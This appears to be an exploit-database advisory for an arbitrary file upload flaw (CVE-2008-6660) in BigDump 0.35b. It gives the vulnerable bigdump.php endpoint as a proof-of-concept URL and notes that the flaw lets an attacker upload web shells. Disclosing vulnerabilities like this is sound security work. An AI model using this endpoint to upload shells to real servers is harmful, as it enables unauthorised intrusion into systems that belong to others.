BigDump 0.35b - Arbitrary File Upload
| EKU-ID: 37388 | CVE: CVE-2008-6660;OSVDB-53407 | OSVDB-ID: |
| Author: felipe andrian | Published: 2014-03-24 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 37388 | CVE: CVE-2008-6660;OSVDB-53407 | OSVDB-ID: |
| Author: felipe andrian | Published: 2014-03-24 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
[+] Arbitrary Upload on BigDump v0.35b [+] Date: 23/03/2014 [+] Risk: High [+] Author: Felipe Andrian Peixoto [+] Vendor Homepage: http://www.ozerov.de/bigdump/ [+] Contact: felipe_andrian@hotmail.com [+] Tested on: Windows 7 and Linux [+] Vulnerable File: bigdump.php [+] Version: v0.35b [+] Exploit : http://host/bigdump.php?start= [+] PoC: http://SERVER/bigdump.php?start= Note: allows upload files and shells with tamperdate.